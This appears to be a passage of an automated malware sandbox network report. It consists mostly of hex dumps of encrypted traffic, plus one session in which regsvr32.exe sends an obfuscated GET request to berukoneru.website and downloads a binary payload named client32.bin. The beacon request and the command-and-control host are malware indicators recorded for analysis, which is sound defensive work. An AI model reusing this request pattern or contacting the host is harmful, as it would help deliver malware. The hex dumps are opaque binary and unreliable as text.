                        Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                        2021-12-14 09:34:07 UTC854INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                        Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                        2021-12-14 09:34:07 UTC870INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                        Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                        2021-12-14 09:34:07 UTC886INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                        Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                        2021-12-14 09:34:07 UTC902INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                        Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                        2021-12-14 09:34:07 UTC918INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                        Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                        2021-12-14 09:34:07 UTC934INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                        Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                        2021-12-14 09:34:07 UTC950INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                        Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                        2021-12-14 09:34:07 UTC966INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                        Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                        2021-12-14 09:34:07 UTC982INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                        Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                        2021-12-14 09:34:07 UTC998INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                        Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                        2021-12-14 09:34:07 UTC1014INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                        Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                        2021-12-14 09:34:07 UTC1030INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                        Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                        2021-12-14 09:34:07 UTC1046INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                        Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                        2021-12-14 09:34:07 UTC1062INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                        Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                        2021-12-14 09:34:07 UTC1078INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                        Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                        2021-12-14 09:34:07 UTC1094INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                        Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        5 | 192.168.2.5 | 49802 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                        Timestamp | kBytes transferred | Direction | Data
                        2021-12-14 09:34:07 UTC | 1101 | OUT | GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: berukoneru.website
                        2021-12-14 09:34:08 UTC | 1102 | IN | HTTP/1.1 200 OK
                        Server: nginx/1.20.1
                        Date: Tue, 14 Dec 2021 09:34:07 GMT
                        Content-Type: application/zip
                        Content-Length: 268426
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Set-Cookie: PHPSESSID=hknqubagd3jvbvckr7p3s9hgo7; path=/; domain=.berukoneru.website
                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                        Cache-Control: public
                        Pragma: no-cache
                        Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                        Content-Transfer-Encoding: Binary
                        Content-Disposition: attachment; filename=client32.bin
                        2021-12-14 09:34:08 UTC1102INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                        Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                        2021-12-14 09:34:08 UTC1118INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                        Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                        2021-12-14 09:34:08 UTC1198INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 